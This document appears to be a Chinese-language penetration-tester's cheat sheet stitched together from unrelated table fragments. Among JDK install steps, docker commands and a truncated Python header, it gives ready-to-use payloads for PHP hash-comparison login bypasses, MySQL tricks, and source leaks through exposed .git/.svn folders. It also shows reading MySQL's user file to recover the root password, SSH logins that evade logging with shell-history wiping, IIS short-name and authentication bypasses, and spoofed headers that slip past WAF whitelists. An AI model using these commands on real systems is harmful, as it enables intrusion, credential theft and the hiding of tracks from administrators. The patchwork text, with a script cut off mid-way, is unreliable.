url:http://xxx/?username[]=1&password[]=1
绕过
md5($_GET['username'])==md5($_GET['password'])
sha1(...)==sha1(...)
因为md5,sha1函数不能计算数组的hash值,返回的都是null,导致null==null等式成立
php中使用弱比较时,md5(xxx)的值的开头为0e的字符串,可以绕过
if(md5(xxx)==0) true
计算出来为0e的字符串有人已经总结了http://www.219.me/posts/2884.html
首先插入2条语句
1.insert into user(username,password) values('admin','password')
2.insert into user(username,password) values('admin ','password')
查询一下
1.select username,password from user where username='admin'
2.select username,password from user where username='admin '
上面2条语句查询结果返回相同,将有空格的admin和无空格的admin都返回,这是mysql的一个bug,忽略字符串最右的空格
如果列id为整型,查询时id=0aaa会强制转化为0再进行查询
| 参考http://www.s2.sshz.org/post/source-code-leak/ | |
| cvs url/CVS/Root url/CVS/Entries | |
| svn url/.svn | |
| git url/.git | |
| Mercurial url/.hg | |
| Bitkeeper url/.bk |
| 通过select @@datadir;获得数据存储的路径path | |
| LOAD DATA INFILE 'path/mysql/user.MYD' INTO TABLE sometable fields terminated by '' LINES TERMINATED BY '\0' | |
| 然后查看sometable里的数据,解密就可以获得root账户的密码 |
| ssh -T user@host /bin/bash -i 隐藏的远程登陆 | |
| 登陆后 unset HISTFILE;export HISTFILE=;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;export HISTIGNORE=*;export HISTCONTROL=ignorespace | |
| 不记录命令 | |
| ssh -o UserKnownHostsFile=/dev/null -T user@host /bin/bash -if 隐藏登陆+不记录 |
| iis 短文件名猜解 | |
| apache+windows长文件名可用 前6个字符+"~1".ext 访问或者下载文件 | |
| iis 需要认证的目录 认证绕过 | |
| http://www.freebuf.com/articles/4908.html | |
| Windows 支持的长文件名最多为 255 个字符。Windows 还以 8.3 格式生成与 MS-DOS 兼容的(短)文件名,以允许基于 MS-DOS 或 16 位 Windows 的程序访问这些文件。 | |
| Windows 按以下方式从长文件名生成短文件名: |
| download package from official site | |
| tar -xzvf xxx.tar.gz | |
| mv jdk1.8.0_162 /opt | |
| update-alternatives --install /usr/bin/java java /opt/jdk1.8.0_162/bin/java 1 | |
| update-alternatives --install /usr/bin/javac javac /opt/jdk1.8.0_162/bin/javac 1 | |
| update-alternatives --install /usr/lib/mozilla/plugins/libjavaplugin.so mozilla-javaplugin.so /opt/jdk1.8.0_162/jre/lib/amd64/libnpjp2.so 1 | |
| update-alternatives --set java /opt/jdk1.8.0_162/bin/java | |
| update-alternatives --set javac /opt/jdk1.8.0_162/bin/javac | |
| update-alternatives --set mozilla-javaplugin.so /opt/jdk1.8.0_162/jre/lib/amd64/libnpjp2.so | |
| java -version |
| #!/usr/bin/env python | |
| # -*- coding: utf-8 -*- | |
| ''' | |
| author: wh1t3P1g <wh1t3P1g@gmail.com> | |
| description: | |
| fisrt download jad: http://www.javadecompilers.com/jad | |
| only for macos && linux | |
| ''' | |
| import zipfile |
| docker ps -l 查看正在运行的镜像信息 | |
| docker run -it name 运行镜像 | |
| docker inspect id 查看镜像 | |
| docker commit -m "What did you do to the image" -a "Author Name" container-id repository/new_image_name 保存状态 | |
| docker stop id 停止当前正在运行的容器 | |
| docker login -u username 登陆 | |
| docker push docker-registry-username/docker-image-name 推送到远程 |
| - X-forwarded-for | |
| - X-remote-IP | |
| - X-originating-IP | |
| - x-remote-addr | |
| waf通常会有一个不拦截任意请求的白名单ip,上面的几个头可以用来伪造ip | |
| 如: | |
| X-Forwarded-For: 127.0.0.1 | |
| X-Remote-Ip: 127.0.0.1 | |
| X-Originating-Ip: 127.0.0.1 | |
| X-Remote-Addr: 127.0.0.1 |
